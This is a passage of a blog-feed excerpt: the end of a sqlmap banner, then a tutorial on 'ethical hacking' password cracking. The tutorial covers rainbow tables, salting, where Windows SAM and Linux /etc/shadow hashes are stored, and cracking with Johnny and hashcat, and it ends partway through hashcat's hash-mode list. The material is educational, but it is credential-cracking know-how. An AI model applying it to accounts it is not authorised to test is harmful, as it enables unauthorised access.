class="s2">"]_____ ___ ___ {1.5.3#stable} |_ -| . ["</span><span class="o">]</span> | .<span class="s1">'| . | |___|_ ["]_|_|_|__,| _| |_|V... |_| http://sqlmap.org Usage: python3 sqlmap [options] sqlmap: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, --wizard, --shell, --update, --purge, --list-tampers or --dependencies). Use -h for basic and -hh for advanced help [16:08:05] [WARNING] your sqlmap version is outdated </span></code></pre> </div> owasp sslscan sslyze cybersecurity Ethical Hacking : Users password cracking BEIDI DINA SAMUEL Sat, 24 Aug 2024 00:36:18 +0000 https://forem.com/samglish/ethical-hacking-users-password-cracking-4f85 https://forem.com/samglish/ethical-hacking-users-password-cracking-4f85 <p><strong>Github project : <br> <a href="https://github.com/samglish/Client_side_Advanced" rel="noopener noreferrer">https://github.com/samglish/Client_side_Advanced</a></strong></p> <p>Password cracking methods<br> Password storage<br> Rainbow tables<br> Windows password<br> Linux password</p> <h1> Methods </h1> <ul> <li>The first will be to guess it.</li> <li>Dictionary</li> <li>Brute force</li> <li>Hybrid</li> </ul> <h1> Password storage </h1> <h3> passwords are stored encrypted </h3> <h2> Hashing </h2> <p><code>Hashing</code> is the process of assigning a numeric value to an alphanumeric string by first converting it into another numeric value and storing it in an indexed table to make data retrieval faster and/or masking the data for encryption, performed by a hash function.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0vo6zua4a7e503pfb14e.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0vo6zua4a7e503pfb14e.png" alt=" " width="800" height="453"></a></p> <h2> Rainbow table </h2> <p>A <code>rainbow table</code> is in cryptanalysis, a data structure created in 2003 by Philippe Oechslin of EPFL1 to find a password from its fingerprint. It is an improvement of the time-memory tradeoffs proposed by Martin Hellman in the 1980.</p> <h3> Structure of a rainbow table </h3> <p>Rainbow tables are composed of hash chains. This procedure is based on a method introduced by Martin Hellman. Based on a certain number of possible passwords, which serve as the starting point for the hash chains, the chains are hashed and the resulting hash value is "reduced" into a form that meets the password criteria and can then be hashed again . It is important here that the reduction functions that perform the reduction are not an inverse of the hash procedure, because such an inverse function does not exist. The reduction turns the hash, which is much larger than the original password, i.e. much more complex, into a value that meets the password strength criteria.</p> <p><code>Example</code>: The example hash value of the "password" is hunter22</p> <p>20d2fe5e369db54ec70906 39a9dc30ec4d6086049362 39d39e2de07fda09eb0b</p> <p>The reduction of this could be to use only the first 8 characters of the hash as the next password in the chain. These would then be "20d2fe5e" and can be hashed again as the next step.</p> <p>A hash chain consists of "alternating" possible passwords and their corresponding hash values. On its own, however, this method does not offer any advantage over the theoretical use of a simple hash table, because if the hash chains are used to an extent that covers all possible passwords of the corresponding complexity and then these chains are stored in a table, the required storage space is at least as large as that of a simple hash table. Therefore, only the starting point, i.e. the first password and the last "password", i.e. a last reduction of the last created hash value of a chain, is stored in a table. The table thus consists of a corresponding number of start and end points of hash chains.</p> <p>If you now have a hash value, you can use the reduction function to test whether the hash value is part of one of the created hash chains. To do this, the reduction function is applied to the hash value. If the result of the function is one of the end points of the chain, then you have found the hash chain that contains the password for the existing hash value. In the most favorable case just described, this would be the penultimate password in the chain, which led to the last hash value in the chain. As a rule, however, you will not find a password directly in the first reduction step. Therefore, the reduction function(s) and the hash function must be repeatedly applied to the originally captured hash value. One can imagine this by trying to put the hash chain containing the captured hash value back together again, starting at the end. The moment the partially constructed hash chain has an endpoint stored in the rainbow table, you have found the complete hash chain and can extract the password in plain text.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0x18do3zxj93ilm3mpl1.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0x18do3zxj93ilm3mpl1.png" alt=" " width="536" height="288"></a></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgqmq6qnbzojm2296e8r9.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgqmq6qnbzojm2296e8r9.png" alt=" " width="799" height="368"></a></p> <h2> The salt </h2> <p>The effectiveness of tables decreases significantly when hash functions are combined with a salt. In the context of a password system, the salt is a random component or counter that changes depending on the user. If two users have the same password, the salt prevents the hashes from being identical. Informally, the salt consists of an operation like this:</p> <p><code>fingerprint = h(password + salt)</code></p> <h1> Windows password </h1> <ul> <li>Windows, the most used OS</li> <li>More and more secure but still vulnerable</li> <li>Storage in a SAM (System Account Management) registry</li> <li>Exception, Use of Active Directory (LDAP BDD)</li> <li> <p><code>C:\&lt;systemroot&gt;\repair &amp; C:\&gt; expand SAM uncompressedSAM</code></p> <h1> Linux password </h1> <ul> <li>Different from Windows</li> <li> <code>/etc/passwd</code> and <code>/etc/shadow</code>, harder than SAM files</li> <li>Capture method using grub boot loaders</li> <li>Identify then crack</li> </ul> </li> </ul> <p># Tools</p> <ul> <li>Hashcat</li> <li>chntpw</li> <li>Ophcrack</li> <li>Crunch</li> <li>Hash-identifier</li> <li>findmyhash</li> </ul> <p>## Let's try in terminal</p> <ul> <li>Johnny </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>johnny </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg70fvijmocqdd74ksm8x.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg70fvijmocqdd74ksm8x.png" alt=" " width="800" height="468"></a></p> <p>Show shadow then click on <code>start new attack</code> to crack.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffzc977i6ugn9vby5p3sl.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffzc977i6ugn9vby5p3sl.png" alt=" " width="800" height="545"></a></p> <p>Here we see that the password has been cracked.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fu1drg49rzz337qry3ttz.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fu1drg49rzz337qry3ttz.png" alt=" " width="800" height="526"></a></p> <h1> hashcat </h1> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>hashcat <span class="nt">--help</span> </code></pre> </div> <h3> hash examples </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code> - <span class="o">[</span> Hash modes <span class="o">]</span> - <span class="c"># | Name | Category</span> <span class="o">======</span>+<span class="o">==================================================</span>+<span class="o">======================================</span> 900 | MD4 | Raw Hash 0 | MD5 | Raw Hash 100 | SHA1 | Raw Hash 1300 | SHA2-224 | Raw Hash 1400 | SHA2-256 | Raw Hash 10800 | SHA2-384 | Raw Hash 1700 | SHA2-512 | Raw Hash 17300 | SHA3-224 | Raw Hash 17400 | SHA3-256 | Raw Hash 17500 | SHA3-384 | Raw Hash 17600 | SHA3-512 | Raw Hash 6000 | RIPEMD-160 | Raw Hash 600 | BLAKE2b-512 | Raw Hash 11700 | GOST R 34.11-2012 <span class="o">(</span>Streebog<span class="o">)</span> 256-bit, big-endian | Raw Hash 11800 | GOST R 34.11-2012 <span class="o">(</span>Streebog<span class="o">)</span> 512-bit, big-endian | Raw Hash 6900 | GOST R 34.11-94 | Raw Hash 5100 | Half MD5 | Raw Hash 18700 | Java Object hashCode<span class="o">()</span> | Raw Hash 17700 | Keccak-224 | Raw Hash 17800 | Keccak-256 | Raw Hash 17900 | Keccak-384 | Raw Hash 18000 | Keccak-512 | Raw Hash 21400 | sha256<span class="o">(</span>sha256_bin<span class="o">(</span><span class="nv">$pass</span><span class="o">))</span> | Raw Hash 6100 | Whirlpool | Raw Hash 10100 | SipHash | Raw Hash 21000 | BitShares v0.x - sha512<span class="o">(</span>sha512_bin<span class="o">(</span>pass<span class="o">))</span> | Raw Hash 10 | md5<span class="o">(</span><span class="nv">$pass</span>.<span class="nv">$salt</span><span class="o">)</span> | Raw Hash, Salted and/or Iterated 20 | md5<span class="o">(</span><span class="nv">$salt</span>.<span class="nv">$pass</span><span class="o">)</span> | Raw Hash, Salted and/or Iterated 3800 | md5<span class="o">(</span><span class="nv">$salt</span>.<span class="nv">$pass</span>.<span class="nv">$salt</span><span class="o">)</span> | Raw Hash, Salted and/or Iterated 3710 | md5<span class="o">(</span><span class="nv">$salt</span>.md5<span class="o">(</span><span class="nv">$pass</span><span class="o">))</span> | Raw Hash, Salted and/or Iterated 4110 | md5<span class="o">(</span><span class="nv">$salt</span>.md5<span class="o">(</span><span class="nv">$pass</span>.<span class="nv">$salt</span><span class="o">))</span> | Raw Hash, Salted and/or Iterated 4010 | md5<span class="o">(</span><span class="nv">$salt</span>.md5<span class="o">(</span><span class="nv">$salt</span>.<span class="nv">$pass</span><span class="o">))</span> | Raw Hash, Salted and/or Iterated 21300 | md5<span class="o">(</span><span class="nv">$salt</span>.sha1<span class="o">(</span><span class="nv">$salt</span>.<span class="nv">$pass</span><span class="o">))</span> | Raw Hash, Salted and/or Iterated 40 | md5<span class="o">(</span><span class="nv">$salt</span>.utf16le<span class="o">(</span><span class="nv">$pass</span><span class="o">))</span> | Raw Hash, Salted and/or Iterated 2600 | md5<span class="o">(</span>md5<span class="o">(</span><span class="nv">$pass</span><span class="o">))</span> | Raw Hash, Salted and/or Iterated 3910 | md5<span class="o">(</span>md5<span class="o">(</span><span class="nv">$pass</span><span class="o">)</span>.md5<span class="o">(</span><span class="nv">$salt</span><span class="o">))</span> | Raw Hash, Salted and/or Iterated 4400 | md5<span class="o">(</span>sha1<span class="o">(</span><span class="nv">$pass</span><span class="o">))</span> | Raw Hash, Salted and/or Iterated 20900 | md5<span class="o">(</span>sha1<span class="o">(</span><span class="nv">$pass</span><span class="o">)</span>.md5<span class="o">(</span><span class="nv">$pass</span><span class="o">)</span>.sha1<span class="o">(</span><span class="nv">$pass</span><span class="o">))</span> | Raw Hash, Salted and/or Iterated 21200 | md5<span class="o">(</span>sha1<span class="o">(</span><span class="nv">$salt</span><span class="o">)</span>.md5<span class="o">(</span><span class="nv">$pass</span><span class="o">))</span> | Raw Hash, Salted and/or Iterated 4300 | md5<span class="o">(</span>strtoupper<span class="o">(</span>md5<span class="o">(</span><span class="nv">$pass</span><span class="o">)))</span> | Raw Hash, Salted and/or Iterated 30 | md5<span class="o">(</span>utf16le<span class="o">(</span><span class="nv">$pass</span><span class="o">)</span>.<span class="nv">$salt</span><span class="o">)</span> | Raw Hash, Salted and/or Iterated 110 | sha1<span class="o">(</span><span class="nv">$pass</span>.<span class="nv">$salt</span><span class="o">)</span> | Raw Hash, Salted and/or Iterated 120 | sha1<span class="o">(</span><span class="nv">$salt</span>.<span class="nv">$pass</span><span class="o">)</span> | Raw Hash, Salted and/or Iterated 4900 | sha1<span class="o">(</span><span class="nv">$salt</span>.<span class="nv">$pass</span>.<span class="nv">$salt</span><span class="o">)</span> | Raw Hash, Salted and/or Iterated 4520 | sha1<span class="o">(</span><span class="nv">$salt</span>.sha1<span class="o">(</span><span class="nv">$pass</span><span class="o">))</span> | Raw Hash, Salted and/or Iterated 140 | sha1<span class="o">(</span><span class="nv">$salt</span>.utf16le<span class="o">(</span><span class="nv">$pass</span><span class="o">))</span> | Raw Hash, Salted and/or Iterated 19300 | sha1<span class="o">(</span><span class="nv">$salt1</span>.<span class="nv">$pass</span>.<span class="nv">$salt2</span><span class="o">)</span> | Raw Hash, Salted and/or Iterated 14400 | sha1<span class="o">(</span>CX<span class="o">)</span> | Raw Hash, Salted and/or Iterated 4700 | sha1<span class="o">(</span>md5<span class="o">(</span><span class="nv">$pass</span><span class="o">))</span> | Raw Hash, Salted and/or Iterated 4710 | sha1<span class="o">(</span>md5<span class="o">(</span><span class="nv">$pass</span><span class="o">)</span>.<span class="nv">$salt</span><span class="o">)</span> | Raw Hash, Salted and/or Iterated 21100 | sha1<span class="o">(</span>md5<span class="o">(</span><span class="nv">$pass</span>.<span class="nv">$salt</span><span class="o">))</span> | Raw Hash, Salted and/or Iterated 18500 | sha1<span class="o">(</span>md5<span class="o">(</span>md5<span class="o">(</span><span class="nv">$pass</span><span class="o">)))</span> | Raw Hash, Salted and/or Iterated 4500 | sha1<span class="o">(</span>sha1<span class="o">(</span><span class="nv">$pass</span><span class="o">))</span> | Raw Hash, Salted and/or Iterated 130 | sha1<span class="o">(</span>utf16le<span class="o">(</span><span class="nv">$pass</span><span class="o">)</span>.<span class="nv">$salt</span><span class="o">)</span> | Raw Hash, Salted and/or Iterated 1410 | sha256<span class="o">(</span><span class="nv">$pass</span>.<span class="nv">$salt</span><span class="o">)</span> | Raw Hash, Salted and/or Iterated 1420 | sha256<span class="o">(</span><span class="nv">$salt</span>.<span class="nv">$pass</span><span class="o">)</span> | Raw Hash, Salted and/or Iterated 22300 | sha256<span class="o">(</span><span class="nv">$salt</span>.<span class="nv">$pass</span>.<span class="nv">$salt</span><span class="o">)</span> | Raw Hash, Salted and/or Iterated 1440 | sha256<span class="o">(</span><span class="nv">$salt</span>.utf16le<span class="o">(</span><span class="nv">$pass</span><span class="o">))</span> | Raw Hash, Salted and/or Iterated 20800 | sha256<span class="o">(</span>md5<span class="o">(</span><span class="nv">$pass</span><span class="o">))</span> | Raw Hash, Salted and/or Iterated 20710 | sha256<span class="o">(</span>sha256<span class="o">(</span><span class="nv">$pass</span><span class="o">)</span>.<span class="nv">$salt</span><span class="o">)</span> | Raw Hash, Salted and/or Iterated 1430 | sha256<span class="o">(</span>utf16le<span class="o">(</span><span class="nv">$pass</span><span class="o">)</span>.<span class="nv">$salt</span><span class="o">)</span> | Raw Hash, Salted and/or Iterated 1710 | sha512<span class="o">(</span><span class="nv">$pass</span>.<span class="nv">$salt</span><span class="o">)</span> | Raw Hash, Salted and/or Iterated 1720 | sha512<span class="o">(</span><span class="nv">$salt</span>.<span class="nv">$pass</span><span class="o">)</span> | Raw Hash, Salted and/or Iterated 1740 | sha512<span class="o">(</span><span class="nv">$salt</span>.utf16le<span class="o">(</span><span class="nv">$pass</span><span class="o">))</span> | Raw Hash, Salted and/or Iterated 1730 | sha512<span class="o">(</span>utf16le<span class="o">(</span><span class="nv">$pass</span><span class="o">)</span>.<span class="nv">$salt</span><span class="o">)</span> | Raw Hash, Salted and/or Iterated 19500 | Ruby on Rails Restful-Authentication | Raw Hash, Salted and/or Iterated 50 | HMAC-MD5 <span class="o">(</span>key <span class="o">=</span> <span class="nv">$pass</span><span class="o">)</span> | Raw Hash, Authenticated 60 | HMAC-MD5 <span class="o">(</span>key <span class="o">=</span> <span class="nv">$salt</span><span class="o">)</span> | Raw Hash, Authenticated 150 | HMAC-SHA1 <span class="o">(</span>key <span class="o">=</span> <span class="nv">$pass</span><span class="o">)</span> | Raw Hash, Authenticated 160 | HMAC-SHA1 <span class="o">(</span>key <span class="o">=</span> <span class="nv">$salt</span><span class="o">)</span> | Raw Hash, Authenticated 1450 | HMAC-SHA256 <span class="o">(</span>key <span class="o">=</span> <span class="nv">$pass</span><span class="o">)</span> | Raw Hash, Authenticated 1460 | HMAC-SHA256 <span class="o">(</span>key <span class="o">=</span> <span class="nv">$salt</span><span class="o">)</span> | Raw Hash, Authenticated 1750 | HMAC-SHA512 <span class="o">(</span>key <span class="o">=</span> <span class="nv">$pass</span><span class="o">)</span> | Raw Hash, Authenticated 1760 | HMAC-SHA512 <span class="o">(</span>key <span class="o">=</span> <span class="nv">$salt</span><span class="o">)</span> | Raw Hash, Authenticated 11750 | HMAC-Streebog-256 <span class="o">(</span>key <span class="o">=</span> <span class="nv">$pass</span><span class="o">)</span>, big-endian | Raw Hash, Authenticated 11760 | HMAC-Streebog-256 <span class="o">(</span>key <span class="o">=</span> <span class="nv">$salt</span><span class="o">)</span>, big-endian | Raw Hash, Authenticated 11850 | HMAC-Streebog-512 <span class="o">(</span>key <span class="o">=</span> <span class="nv">$pass</span><span class="o">)</span>, big-endian | Raw Hash, Authenticated 11860 | HMAC-Streebog-512 <span class="o">(</span>key <span class="o">=</span> <span class="nv">$salt</span><span class="o">)</span>, big-endian | Raw Hash, Authenticated 11500 | CRC32 | Raw Checksum 14100 | 3DES <span class="o">(</span>PT <span class="o">=</span> <span class="nv">$salt</span>, key <span class="o">=</span> <span class="nv">$pass</span><span class="o">)</span> | Raw Cipher, Known-Plaintext attack 14000 | DES <span class="o">(</span>PT <span class="o">=</span> <span class="nv">$salt</span>, key <span class="o">=</span> <span class="nv">$pass</span><span class="o">)</span> | Raw Cipher, Known-Plaintext attack 15400 | ChaCha20 | Raw Cipher, Known-Plaintext attack 14900 | Skip32 <span class="o">(</span>PT <span class="o">=</span> <span class="nv">$salt</span>, key <span class="o">=</span> <span class="nv">$pass</span><span class="o">)</span> | Raw Cipher, Known-Plaintext attack 11900 | PBKDF2-HMAC-MD5 | Generic KDF 12000 | PBKDF2-HMAC-SHA1 | Generic KDF 10900 | PBKDF2-HMAC-SHA256 | Generic KDF 12100 | PBKDF2-HMAC-SHA512 | Generic KDF 8900 | scrypt | Generic KDF 400 | phpass | Generic KDF 16900 | Ansible Vault | Generic KDF 12001 | Atlassian <span class="o">(</span>PBKDF2-HMAC-SHA1<span class="o">)</span> | Generic KDF 20200 | Python passlib pbkdf2-sha512 | Generic KDF 20300 | Python passlib pbkdf2-sha256 | Generic KDF 20400 | Python passlib pbkdf2-sha1 | Generic KDF 16100 | TACACS+ | Network Protocols 11400 | SIP digest authentication <span class="o">(</span>MD5<span class="o">)</span> | Network Protocols 5300 | IKE-PSK MD5 | Network Protocols 5400 | IKE-PSK SHA1 | Network Protocols 23200 | XMPP SCRAM PBKDF2-SHA1 | Network Protocols 2500 | WPA-EAPOL-PBKDF2 | Network Protocols 2501 | WPA-EAPOL-PMK | Network Protocols 22000 | WPA-PBKDF2-PMKID+EAPOL | Network Protocols 22001 | WPA-PMK-PMKID+EAPOL | Network Protocols 16800 | WPA-PMKID-PBKDF2 | Network Protocols 16801 | WPA-PMKID-PMK | Network Protocols 7300 | IPMI2 RAKP HMAC-SHA1 | Network Protocols 10200 | CRAM-MD5 | Network Protocols 4800 | iSCSI CHAP authentication, MD5<span class="o">(</span>CHAP<span class="o">)</span> | Network Protocols 16500 | JWT <span class="o">(</span>JSON Web Token<span class="o">)</span> | Network Protocols 22600 | Telegram Desktop App Passcode <span class="o">(</span>PBKDF2-HMAC-SHA1<span class="o">)</span> | Network Protocols 22301 | Telegram Mobile App Passcode <span class="o">(</span>SHA256<span class="o">)</span> | Network Protocols 7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth | Network Protocols 13100 | Kerberos 5, etype 23, TGS-REP | Network Protocols 18200 | Kerberos 5, etype 23, AS-REP | Network Protocols 19600 | Kerberos 5, etype 17, TGS-REP | Network Protocols 19700 | Kerberos 5, etype 18, TGS-REP | Network Protocols 19800 | Kerberos 5, etype 17, Pre-Auth | Network Protocols 19900 | Kerberos 5, etype 18, Pre-Auth | Network Protocols 5500 | NetNTLMv1 / NetNTLMv1+ESS | Network Protocols 5600 | NetNTLMv2 | Network Protocols 23 | Skype | Network Protocols 11100 | PostgreSQL CRAM <span class="o">(</span>MD5<span class="o">)</span> | Network Protocols 11200 | MySQL CRAM <span class="o">(</span>SHA1<span class="o">)</span> | Network Protocols 8500 | RACF | Operating System 6300 | AIX <span class="o">{</span>smd5<span class="o">}</span> | Operating System 6700 | AIX <span class="o">{</span>ssha1<span class="o">}</span> | Operating System 6400 | AIX <span class="o">{</span>ssha256<span class="o">}</span> | Operating System 6500 | AIX <span class="o">{</span>ssha512<span class="o">}</span> | Operating System 3000 | LM | Operating System 19000 | QNX /etc/shadow <span class="o">(</span>MD5<span class="o">)</span> | Operating System 19100 | QNX /etc/shadow <span class="o">(</span>SHA256<span class="o">)</span> | Operating System 19200 | QNX /etc/shadow <span class="o">(</span>SHA512<span class="o">)</span> | Operating System 15300 | DPAPI masterkey file v1 | Operating System 15900 | DPAPI masterkey file v2 | Operating System 7200 | GRUB 2 | Operating System 12800 | MS-AzureSync PBKDF2-HMAC-SHA256 | Operating System 12400 | BSDi Crypt, Extended DES | Operating System 1000 | NTLM | Operating System 122 | macOS v10.4, macOS v10.5, MacOS v10.6 | Operating System 1722 | macOS v10.7 | Operating System 7100 | macOS v10.8+ <span class="o">(</span>PBKDF2-SHA512<span class="o">)</span> | Operating System 9900 | Radmin2 | Operating System 5800 | Samsung Android Password/PIN | Operating System 3200 | bcrypt <span class="nv">$2</span><span class="k">*</span><span class="nv">$,</span> Blowfish <span class="o">(</span>Unix<span class="o">)</span> | Operating System 500 | md5crypt, MD5 <span class="o">(</span>Unix<span class="o">)</span>, Cisco-IOS <span class="nv">$1$ </span><span class="o">(</span>MD5<span class="o">)</span> | Operating System 1500 | descrypt, DES <span class="o">(</span>Unix<span class="o">)</span>, Traditional DES | Operating System 7400 | sha256crypt <span class="nv">$5$,</span> SHA256 <span class="o">(</span>Unix<span class="o">)</span> | Operating System 1800 | sha512crypt <span class="nv">$6$,</span> SHA512 <span class="o">(</span>Unix<span class="o">)</span> | Operating System 13800 | Windows Phone 8+ PIN/password | Operating System 2410 | Cisco-ASA MD5 | Operating System 9200 | Cisco-IOS <span class="nv">$8$ </span><span class="o">(</span>PBKDF2-SHA256<span class="o">)</span> | Operating System 9300 | Cisco-IOS <span class="nv">$9$ </span><span class="o">(</span>scrypt<span class="o">)</span> | Operating System 5700 | Cisco-IOS <span class="nb">type </span>4 <span class="o">(</span>SHA256<span class="o">)</span> | Operating System 2400 | Cisco-PIX MD5 | Operating System 8100 | Citrix NetScaler <span class="o">(</span>SHA1<span class="o">)</span> | Operating System 22200 | Citrix NetScaler <span class="o">(</span>SHA512<span class="o">)</span> | Operating System 1100 | Domain Cached Credentials <span class="o">(</span>DCC<span class="o">)</span>, MS Cache | Operating System 2100 | Domain Cached Credentials 2 <span class="o">(</span>DCC2<span class="o">)</span>, MS Cache 2 | Operating System 7000 | FortiGate <span class="o">(</span>FortiOS<span class="o">)</span> | Operating System 125 | ArubaOS | Operating System 501 | Juniper IVE | Operating System 22 | Juniper NetScreen/SSG <span class="o">(</span>ScreenOS<span class="o">)</span> | Operating System 15100 | Juniper/NetBSD sha1crypt | Operating System 131 | MSSQL <span class="o">(</span>2000<span class="o">)</span> | Database Server 132 | MSSQL <span class="o">(</span>2005<span class="o">)</span> | Database Server 1731 | MSSQL <span class="o">(</span>2012, 2014<span class="o">)</span> | Database Server 12 | PostgreSQL | Database Server 3100 | Oracle H: Type <span class="o">(</span>Oracle 7+<span class="o">)</span> | Database Server 112 | Oracle S: Type <span class="o">(</span>Oracle 11+<span class="o">)</span> | Database Server 12300 | Oracle T: Type <span class="o">(</span>Oracle 12+<span class="o">)</span> | Database Server 7401 | MySQL <span class="nv">$A$ </span><span class="o">(</span>sha256crypt<span class="o">)</span> | Database Server 200 | MySQL323 | Database Server 300 | MySQL4.1/MySQL5 | Database Server 8000 | Sybase ASE | Database Server 1421 | hMailServer | FTP, HTTP, SMTP, LDAP Server 8300 | DNSSEC <span class="o">(</span>NSEC3<span class="o">)</span> | FTP, HTTP, SMTP, LDAP Server 16400 | CRAM-MD5 Dovecot | FTP, HTTP, SMTP, LDAP Server 1411 | SSHA-256<span class="o">(</span>Base64<span class="o">)</span>, LDAP <span class="o">{</span>SSHA256<span class="o">}</span> | FTP, HTTP, SMTP, LDAP Server 1711 | SSHA-512<span class="o">(</span>Base64<span class="o">)</span>, LDAP <span class="o">{</span>SSHA512<span class="o">}</span> | FTP, HTTP, SMTP, LDAP Server 10901 | RedHat 389-DS LDAP <span class="o">(</span>PBKDF2-HMAC-SHA256<span class="o">)</span> | FTP, HTTP, SMTP, LDAP Server 15000 | FileZilla Server <span class="o">&gt;=</span> 0.9.55 | FTP, HTTP, SMTP, LDAP Server 12600 | ColdFusion 10+ | FTP, HTTP, SMTP, LDAP Server 1600 | Apache <span class="nv">$apr1$ </span>MD5, md5apr1, MD5 <span class="o">(</span>APR<span class="o">)</span> | FTP, HTTP, SMTP, LDAP Server 141 | Episerver 6.x &lt; .NET 4 | FTP, HTTP, SMTP, LDAP Server 1441 | Episerver 6.x <span class="o">&gt;=</span> .NET 4 | FTP, HTTP, SMTP, LDAP Server 101 | nsldap, SHA-1<span class="o">(</span>Base64<span class="o">)</span>, Netscape LDAP SHA | FTP, HTTP, SMTP, LDAP Server 111 | nsldaps, SSHA-1<span class="o">(</span>Base64<span class="o">)</span>, Netscape LDAP SSHA | FTP, HTTP, SMTP, LDAP Server 7700 | SAP CODVN B <span class="o">(</span>BCODE<span class="o">)</span> | Enterprise Application Software <span class="o">(</span>EAS<span class="o">)</span> 7701 | SAP CODVN B <span class="o">(</span>BCODE<span class="o">)</span> from RFC_READ_TABLE | Enterprise Application Software <span class="o">(</span>EAS<span class="o">)</span> 7800 | SAP CODVN F/G <span class="o">(</span>PASSCODE<span class="o">)</span> | Enterprise Application Software <span class="o">(</span>EAS<span class="o">)</span> 7801 | SAP CODVN F/G <span class="o">(</span>PASSCODE<span class="o">)</span> from RFC_READ_TABLE | Enterprise Application Software <span class="o">(</span>EAS<span class="o">)</span> 10300 | SAP CODVN H <span class="o">(</span>PWDSALTEDHASH<span class="o">)</span> iSSHA-1 | Enterprise Application Software <span class="o">(</span>EAS<span class="o">)</span> 133 | PeopleSoft | Enterprise Application Software <span class="o">(</span>EAS<span class="o">)</span> 13500 | PeopleSoft PS_TOKEN | Enterprise Application Software <span class="o">(</span>EAS<span class="o">)</span> 21500 | SolarWinds Orion | Enterprise Application Software <span class="o">(</span>EAS<span class="o">)</span> 8600 | Lotus Notes/Domino 5 | Enterprise Application Software <span class="o">(</span>EAS<span class="o">)</span> 8700 | Lotus Notes/Domino 6 | Enterprise Application Software <span class="o">(</span>EAS<span class="o">)</span> 9100 | Lotus Notes/Domino 8 | Enterprise Application Software <span class="o">(</span>EAS<span class="o">)</span> 20600 | Oracle Transportation Management <span class="o">(</span>SHA256<span class="o">)</span> | Enterprise Application Software <span class="o">(</span>EAS<span class="o">)</span> 4711 | Huawei sha1<span class="o">(</span>md5<span class="o">(</span><span class="nv">$pass</span><span class="o">)</span>.<span class="nv">$salt</span><span class="o">)</span> | Enterprise Application Software <span class="o">(</span>EAS<span class="o">)</span> 20711 | AuthMe sha256 | Enterprise Application Software <span class="o">(</span>EAS<span class="o">)</span> 12200 | eCryptfs | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 22400 | AES Crypt <span class="o">(</span>SHA256<span class="o">)</span> | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 14600 | LUKS | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 13711 | VeraCrypt RIPEMD160 + XTS 512 bit | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 13712 | VeraCrypt RIPEMD160 + XTS 1024 bit | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 13713 | VeraCrypt RIPEMD160 + XTS 1536 bit | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 13741 | VeraCrypt RIPEMD160 + XTS 512 bit + boot-mode | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 13742 | VeraCrypt RIPEMD160 + XTS 1024 bit + boot-mode | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 13743 | VeraCrypt RIPEMD160 + XTS 1536 bit + boot-mode | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 13751 | VeraCrypt SHA256 + XTS 512 bit | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 13752 | VeraCrypt SHA256 + XTS 1024 bit | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 13753 | VeraCrypt SHA256 + XTS 1536 bit | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 13761 | VeraCrypt SHA256 + XTS 512 bit + boot-mode | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 13762 | VeraCrypt SHA256 + XTS 1024 bit + boot-mode | Full-Disk Encryption <span class="o">(</span>FDE<span class="o">)</span> 13763 | 